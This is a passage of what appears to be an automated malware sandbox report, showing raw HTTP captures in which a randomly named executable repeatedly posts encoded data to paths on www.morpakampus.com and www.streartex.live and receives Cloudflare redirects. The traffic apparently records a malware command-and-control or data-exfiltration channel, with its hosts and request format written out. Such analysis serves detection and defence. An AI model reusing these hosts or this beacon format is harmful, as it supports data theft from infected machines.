                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Mar 28, 2025 14:35:28.552447081 CET383INHTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Fri, 28 Mar 2025 13:35:28 GMT
                                                                            content-length: 262
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 70 35 44 78 64 3d 33 46 5a 73 79 59 74 76 48 4a 72 77 54 48 48 76 4b 45 36 39 4a 4c 47 44 5a 6e 7a 4b 6d 43 6e 72 4d 75 71 52 41 6c 4a 6e 4b 4c 37 74 32 46 36 77 4a 6a 4f 76 61 70 56 4a 6a 43 6c 2f 67 52 69 57 51 56 54 4c 66 6c 45 33 57 50 5a 77 61 35 78 66 77 6b 55 70 50 6d 43 36 4a 78 4e 31 35 63 67 78 54 68 65 36 47 55 37 48 4a 57 32 55 2b 4e 46 37 31 78 51 55 51 42 58 43 52 44 33 64 26 52 74 52 74 3d 48 32 54 78 44 50 2d 30 79 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Up5Dxd=3FZsyYtvHJrwTHHvKE69JLGDZnzKmCnrMuqRAlJnKL7t2F6wJjOvapVJjCl/gRiWQVTLflE3WPZwa5xfwkUpPmC6JxN15cgxThe6GU7HJW2U+NF71xQUQBXCRD3d&RtRt=H2TxDP-0yx"}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.2249175104.26.0.177801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:33.818110943 CET2062OUTPOST /3lf9/ HTTP/1.1
                                                                            Host: www.morpakampus.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 2163
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.morpakampus.com
                                                                            Referer: http://www.morpakampus.com/3lf9/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 30 45 5a 54 79 58 50 36 72 2f 78 6a 57 6d 36 42 73 62 49 45 42 47 4b 66 71 31 78 33 63 79 61 5a 75 37 76 35 33 30 4b 47 48 4b 72 64 64 77 6d 42 62 32 31 43 78 35 51 39 52 6b 74 4c 39 4a 65 56 63 6f 63 32 34 56 6e 44 74 4f 43 7a 47 4d 30 51 4c 6c 4d 72 61 63 6d 4e 6d 5a 47 35 54 58 68 6f 63 43 4a 78 42 4d 43 2f 39 43 65 55 74 79 61 4a 6e 50 33 31 59 38 77 46 51 59 4e 36 66 4b 4a 65 35 4b 63 34 33 76 45 32 37 75 42 45 6d 34 36 6d 6c 61 6e 43 4e 44 2b 64 59 64 33 72 79 46 46 4a 68 42 34 4f 46 61 57 42 41 68 6c 64 44 79 6d 32 34 66 35 4f 77 4b 6d 34 75 72 39 48 50 69 33 33 61 47 55 44 42 63 39 73 71 4c 7a 66 42 73 30 7a 76 70 4b 62 64 76 4e 71 6a 45 68 46 32 56 30 30 78 50 49 54 54 4b 78 7a 63 2f 46 35 4b 65 39 76 38 76 70 6d 65 75 52 65 42 39 6c 78 41 50 43 66 56 4e 6a 33 62 41 6e 53 4f 54 30 6b 69 33 57 76 51 62 34 48 2b 6c 7a 42 50 36 4c 47 69 44 66 2b 66 78 46 77 64 5a 4b 6d 54 4d 67 41 76 39 4c 6f 55 74 4f 76 30 77 72 68 66 52 75 37 69 6a 74 75 4c 58 49 31 4f 44 78 48 4a 54 50 [TRUNCATED]
                                                                            Data Ascii: Up5Dxd=0EZTyXP6r/xjWm6BsbIEBGKfq1x3cyaZu7v530KGHKrddwmBb21Cx5Q9RktL9JeVcoc24VnDtOCzGM0QLlMracmNmZG5TXhocCJxBMC/9CeUtyaJnP31Y8wFQYN6fKJe5Kc43vE27uBEm46mlanCND+dYd3ryFFJhB4OFaWBAhldDym24f5OwKm4ur9HPi33aGUDBc9sqLzfBs0zvpKbdvNqjEhF2V00xPITTKxzc/F5Ke9v8vpmeuReB9lxAPCfVNj3bAnSOT0ki3WvQb4H+lzBP6LGiDf+fxFwdZKmTMgAv9LoUtOv0wrhfRu7ijtuLXI1ODxHJTP5zgVMzcUx9ycYYh0zDZkA9sU58p8V1/+rzw9WLfJTbdXIAtHmeyiTGoZaLgb+D3ewrb9BvV2XTlnsjD1XFBGVh52ffYNPf2Fv37+1vA0MEVpFi34FI84OBA0dh1JqQD4g1SW0yAD5U9e2RUqAKTf/2SW2U8G6qxfQRFtotyFePOkoIlWnRQ/ppq1rkRy5o6AaKgoZtjxBPYA43/BD6ay+8E7AsLc7lo6PZ8G18egi63PXcTPBu5r0HAOCck2dPYD5JKZU9/8Ben6+0IWBDNEQ157j4olIyoF3JJ4tTiVJQ3+LrGqHswK+NtMu6ng8VkJY70Fdharhwsqcqp2SrB2Yvj7Ss1qa1DP3dlPVjiHyG/ibDTwTNyhGgUqtwa2UihbUK2PnARs8VvAGFwD+n1JfoAQ01uWPRnRyKpK4+AEmZ53S6NLLaKIT5tCMNsn+u2zvLV6VaHpldmckl/buaS7w9kbnTUGjLUAOCAtUsRjNk3I0fGun7ju8+r8tKHBmJLdNVL6stPh/JMw4d7Ve1AEZsOJA6DWmWtWYwSWMlHF3n2fPridHEdpPs4H+n9kCpK38U/CnJbwTskRRrzm2MbtkF0JV+akNlVkKryammYAv8rvO4r3UByL07VCKrL6VixGy2V6nGDmZ2vTw9fAJZmr2BhwbiWkIvueNB [TRUNCATED]
                                                                            Mar 28, 2025 14:35:33.908477068 CET724OUTData Raw: 51 74 67 6d 41 51 71 59 76 52 47 44 57 69 58 7a 36 33 39 53 69 54 50 64 69 31 35 70 48 73 70 38 58 4e 38 50 50 45 48 6c 35 7a 32 33 6c 76 70 43 5a 46 37 62 61 70 4f 59 41 75 7a 2f 61 36 4f 52 2b 53 63 67 2f 66 49 66 4e 47 6a 4e 32 37 68 76 5a 79
                                                                            Data Ascii: QtgmAQqYvRGDWiXz639SiTPdi15pHsp8XN8PPEHl5z23lvpCZF7bapOYAuz/a6OR+Scg/fIfNGjN27hvZyAm74Oto74ZY0p9tGv91182+O+Kzk1SXaf0tRt05H7eSx5g38hUj7uojNxgD3qYCfVdtAOm1LuvRd3nmMBgiI/mMDyChgGLFx/SIrDqIpnA8aaXPXevA8Ey1gScYdyT4DxqPjlG6VTlmKcuebroZTzJGYynq04MeGS
                                                                            Mar 28, 2025 14:35:34.002981901 CET1026INHTTP/1.1 301 Moved Permanently
                                                                            Date: Fri, 28 Mar 2025 13:35:33 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: close
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Fri, 28 Mar 2025 14:35:33 GMT
                                                                            Location: https://www.morpakampus.com/3lf9/
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ygHWr1g9N6gJd9lc6dN2ca9hFg%2FD9nv25wlCWrtBz9rz06FObyfuzk38AqGNyvfyJNDnPMkFQJiqZckwscyzrNoN%2F2KgiDcNvqd2ryYmROGj4IXMQwekp1PAxqB96qqo%2BzUiM0I%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Vary: Accept-Encoding
                                                                            Server: cloudflare
                                                                            CF-RAY: 927782ecae116109-EWR
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=90357&min_rtt=90357&rtt_var=45178&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=2786&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.2249176104.26.0.177801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:36.698415995 CET825OUTPOST /3lf9/ HTTP/1.1
                                                                            Host: www.morpakampus.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 203
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.morpakampus.com
                                                                            Referer: http://www.morpakampus.com/3lf9/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 30 45 5a 54 79 58 50 36 72 2f 78 6a 57 6c 53 42 74 4b 49 45 48 6d 4b 66 6a 6c 78 33 4f 79 61 66 75 37 69 54 33 78 36 57 48 35 4c 64 65 69 75 42 62 43 56 43 38 5a 51 79 5a 45 74 50 2b 35 66 42 63 6f 63 39 34 55 62 44 74 49 75 7a 4a 4b 34 51 43 45 4d 71 57 4d 6d 50 71 35 47 30 54 58 74 4c 63 43 31 68 42 4e 36 2f 39 48 65 55 73 79 4b 4a 73 4e 50 31 49 38 77 63 53 59 4d 34 66 4b 46 4c 35 4b 4d 67 33 73 41 32 37 66 64 45 6e 71 79 6d 7a 64 7a 43 45 6a 2b 63 51 39 32 30 39 31 6b 54 6b 79 6b 46 4c 72 57 31 48 56 78 42 66 78 65 4c 33 66 6c 6a 34 37 76 55 77 75 41 49 61 77 61 5a 5a 67 3d 3d
                                                                            Data Ascii: Up5Dxd=0EZTyXP6r/xjWlSBtKIEHmKfjlx3Oyafu7iT3x6WH5LdeiuBbCVC8ZQyZEtP+5fBcoc94UbDtIuzJK4QCEMqWMmPq5G0TXtLcC1hBN6/9HeUsyKJsNP1I8wcSYM4fKFL5KMg3sA27fdEnqymzdzCEj+cQ92091kTkykFLrW1HVxBfxeL3flj47vUwuAIawaZZg==
                                                                            Mar 28, 2025 14:35:36.801729918 CET1031INHTTP/1.1 301 Moved Permanently
                                                                            Date: Fri, 28 Mar 2025 13:35:36 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: close
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Fri, 28 Mar 2025 14:35:36 GMT
                                                                            Location: https://www.morpakampus.com/3lf9/
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N575SDBIT5yCS8HeblhLZQCYWCoMUcojiNdm2wqDIoOt7Q9%2B7tU5ocvm%2FYoUcTE%2FNAYAXZ%2BbI1SEtLGEwODt3vfR3FfpsgozkWbJFOf%2F2wElHqISHXLCPg%2FLbNKTvI9gtnXZCus%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Vary: Accept-Encoding
                                                                            Server: cloudflare
                                                                            CF-RAY: 927782feacac5e80-EWR
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=89170&min_rtt=89170&rtt_var=44585&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=825&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.2249177104.26.0.177801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:39.452088118 CET2062OUTPOST /3lf9/ HTTP/1.1
                                                                            Host: www.morpakampus.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 3627
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.morpakampus.com
                                                                            Referer: http://www.morpakampus.com/3lf9/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 30 45 5a 54 79 58 50 36 72 2f 78 6a 58 47 4b 42 72 74 38 45 43 47 4b 65 76 46 78 33 63 79 61 62 75 37 75 54 33 30 4b 47 48 4c 6e 64 64 7a 2b 42 62 6d 31 43 77 35 51 79 62 45 74 4c 39 4a 65 55 63 6f 59 6d 34 56 71 32 74 4e 32 7a 47 4e 30 51 4c 6d 55 72 5a 63 6d 4e 38 35 47 33 54 58 74 53 63 43 46 74 42 4e 2f 71 39 44 4b 55 73 42 69 4a 71 39 50 32 57 73 77 63 53 59 4d 6b 66 4b 46 6a 35 4b 46 7a 33 75 68 70 37 73 56 45 6d 49 36 6d 79 36 6e 4e 43 6a 2b 59 50 4e 32 71 79 46 4a 34 68 42 34 53 46 61 44 55 41 68 68 64 46 78 2b 32 34 66 46 4e 70 36 6d 35 78 62 39 48 52 53 33 31 61 47 56 43 42 63 39 73 71 4b 50 66 54 4d 30 7a 76 72 6a 70 53 50 4e 71 2f 55 67 46 6f 6c 4a 53 78 50 63 78 54 4b 68 4a 66 49 6c 35 4c 64 5a 76 37 66 70 6d 66 65 52 59 42 39 6c 32 58 66 43 6c 56 4e 72 56 62 41 33 43 4f 54 30 6b 69 31 75 76 58 49 41 48 71 46 7a 42 53 4b 4c 46 72 6a 66 2f 66 78 42 57 64 62 71 6d 54 4e 34 41 75 4b 6e 6f 57 72 79 73 2b 67 72 38 55 78 75 39 70 44 74 2f 4c 58 56 75 4f 43 6b 71 4a 58 7a [TRUNCATED]
                                                                            Data Ascii: Up5Dxd=0EZTyXP6r/xjXGKBrt8ECGKevFx3cyabu7uT30KGHLnddz+Bbm1Cw5QybEtL9JeUcoYm4Vq2tN2zGN0QLmUrZcmN85G3TXtScCFtBN/q9DKUsBiJq9P2WswcSYMkfKFj5KFz3uhp7sVEmI6my6nNCj+YPN2qyFJ4hB4SFaDUAhhdFx+24fFNp6m5xb9HRS31aGVCBc9sqKPfTM0zvrjpSPNq/UgFolJSxPcxTKhJfIl5LdZv7fpmfeRYB9l2XfClVNrVbA3COT0ki1uvXIAHqFzBSKLFrjf/fxBWdbqmTN4AuKnoWrys+gr8Uxu9pDt/LXVuOCkqJXz5ziNM/YAx9CcbWB03Vpgc9scH8pIj196ryh9WC8tQedXOLNHaUSjiGoc9Lh7+DGWwxdNBqiCWb1nRnD1ALhGBh5TAfZdffCBv2L+1jCcPZ1oPrX4fRs5TBA1shxcRQzAg1RO0yWX5U9e1DErqEDDR2SSIU4uqq37QRV9ot2ZeUekoPlWkEg+UpqgekQbbpKEaLFkZvhZBGYAm1/BCnKyZ8ErAsOcrloCPYe+1+8YizXPpCDPCu5qNHDieclGnPa35JOtU/+8BTH67k4WFHNEz15zz4oYtypN3YYYtIzVJQX+JpGqH2AKPNphT6n8GVlBY6Gxd2Kri9Mqf6Z2dvB2KvgTSs1ma1DX3dVzVnTHyZ/iZHTxVbDdqgU6hwfPJimPUKj7nDXQ7QvAfPQDkj1ICoAQo1q7EQVJyK8+45VohR53ZwtLiUqIZ5tSiNtChtBrvLUKVZ0NldWckl/btaS789kHzTQCZLUAOCRtUsEXNqXIxQmvzxDui+r5GKHYDJKBNHrastPh8Gcw7JrVd1AI+sOJu6DamWeaYyBOMlld3gWfPoidEK9pOs4Hun8YSpL38VJynOdcSj0RStzmsG7x3F117+bANlGwK5TammIAv2rvNwL2UciPB7VPvrKKFilCy3lKnKgee+/T9z/AXZmuKBgkDiWcyvvGNE [TRUNCATED]
                                                                            Mar 28, 2025 14:35:39.541369915 CET2188OUTData Raw: 59 4e 68 2f 4a 33 69 49 76 58 6a 43 57 6a 66 6a 37 48 4e 53 67 43 50 64 6d 46 35 70 46 38 70 38 58 4e 38 50 4c 45 48 68 35 7a 32 76 6c 75 74 53 5a 58 72 62 61 71 6d 59 52 35 6e 2f 64 71 4f 51 7a 79 63 41 2f 66 55 42 4e 46 66 4e 32 37 74 4a 65 48
                                                                            Data Ascii: YNh/J3iIvXjCWjfj7HNSgCPdmF5pF8p8XN8PLEHh5z2vlutSZXrbaqmYR5n/dqOQzycA/fUBNFfN27tJeHAm6vyt+a4ZQUp452u26V4u+OqwzmtSXpr0uiF0+kTeXx596chWj7iQjNwBD3qYDqhdtzmmz7uvft3lssB7iIzjMDzXhgeLZRrSJILqba/Bh6aSRnf0E8E61gKcYfiD4FVqPgNG6XLln6cubbrrXDz7GYm3q2I2e06
                                                                            Mar 28, 2025 14:35:39.633733988 CET1030INHTTP/1.1 301 Moved Permanently
                                                                            Date: Fri, 28 Mar 2025 13:35:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: close
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Fri, 28 Mar 2025 14:35:39 GMT
                                                                            Location: https://www.morpakampus.com/3lf9/
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRdrw1ywpeTewz2%2F3GpZ6MhKVNisNWx4M20dEKh9B%2BjqgWKYIbfxAwQIPShqeyDS5syuyoM%2BsTptNyCOaECzJkKeECp30W8lgahgVLE9QHb8DtpWXUSH%2BNEWR3unT3wCnO%2BXNm4%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Vary: Accept-Encoding
                                                                            Server: cloudflare
                                                                            CF-RAY: 9277830fec028c5f-EWR
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=88974&min_rtt=88974&rtt_var=44487&sent=3&recv=7&lost=0&retrans=0&sent_bytes=0&recv_bytes=4250&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.2249178104.26.0.177801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:42.066667080 CET558OUTGET /3lf9/?Up5Dxd=5GxzxjzYtuQVaXKi96wJQlL5jVVVED3gsqLy8xSnFJL9Njv/LCMj1519KCJv/YXWDbEHwXyFpdS6CdsXIHJjWfKOpLe5XFlJMx8QFerMn32IswyHn8LLdrliT4lw&RtRt=H2TxDP-0yx HTTP/1.1
                                                                            Host: www.morpakampus.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Mar 28, 2025 14:35:42.174566984 CET1031INHTTP/1.1 301 Moved Permanently
                                                                            Date: Fri, 28 Mar 2025 13:35:42 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: close
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Fri, 28 Mar 2025 14:35:42 GMT
                                                                            Location: https://www.morpakampus.com/3lf9/?Up5Dxd=5GxzxjzYtuQVaXKi96wJQlL5jVVVED3gsqLy8xSnFJL9Njv/LCMj1519KCJv/YXWDbEHwXyFpdS6CdsXIHJjWfKOpLe5XFlJMx8QFerMn32IswyHn8LLdrliT4lw&RtRt=H2TxDP-0yx
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bbf8oFeDfdjQLkSXzN1jpg5vv4lEd4QTXm2MdLWlPNnzYNiwkR%2Fz3R5lJnjajQC0I5p6LOFWClezWVijqf7S4s85XpqlrAOFkzM9Uf2fgIF8ohVte6uGqEBXY6b6x3qtY1E9sy4%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 927783203a3318ee-EWR
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=88679&min_rtt=88679&rtt_var=44339&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=558&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></
                                                                            Mar 28, 2025 14:35:42.174592972 CET115INData Raw: 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66
                                                                            Data Ascii: head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.2249179162.254.38.217801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:47.502429962 CET2062OUTPOST /qmo0/ HTTP/1.1
                                                                            Host: www.streartex.live
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 2163
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.streartex.live
                                                                            Referer: http://www.streartex.live/qmo0/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 68 39 44 43 70 47 79 67 54 70 6f 30 74 4d 44 49 61 49 36 55 64 33 6c 68 46 64 52 6e 5a 63 34 4d 77 36 31 33 58 33 79 70 72 58 42 7a 38 55 6a 74 4a 59 36 78 4f 4f 50 7a 64 4a 66 52 4f 64 42 4f 39 4d 36 2f 36 46 6f 49 75 67 54 49 4a 6a 77 75 6e 36 38 69 48 31 72 71 6f 4b 54 61 30 64 30 4c 67 37 36 4d 2f 4f 6f 44 31 6a 2f 68 4f 71 30 50 59 6c 36 42 37 33 36 61 6f 38 55 59 62 4f 79 69 4b 49 2b 50 68 74 62 5a 59 39 37 30 4e 67 49 39 61 79 61 68 72 4a 4b 75 78 55 6d 37 4a 49 75 56 31 42 6a 39 6e 57 78 68 31 2b 4f 73 4f 4b 56 69 58 2f 34 4e 6c 47 70 76 63 6e 54 57 72 4c 4f 33 51 72 4d 42 41 39 55 67 51 76 50 47 30 42 4e 42 6d 55 30 76 77 69 79 6b 46 62 52 30 4f 75 4a 35 70 71 54 51 62 55 6c 46 30 6c 2f 32 4e 43 44 4c 31 79 74 37 64 63 71 51 54 64 58 54 63 43 64 59 6e 42 72 39 75 6f 2b 52 7a 59 4b 41 63 70 6e 6d 49 56 7a 42 4b 68 47 76 4e 68 42 62 7a 70 33 34 6f 77 67 61 4f 31 44 79 30 50 63 62 42 6a 69 39 2b 30 35 66 34 67 78 6e 77 54 75 42 32 6c 4b 70 37 7a 6d 6b 36 6f 38 39 44 51 58 [TRUNCATED]
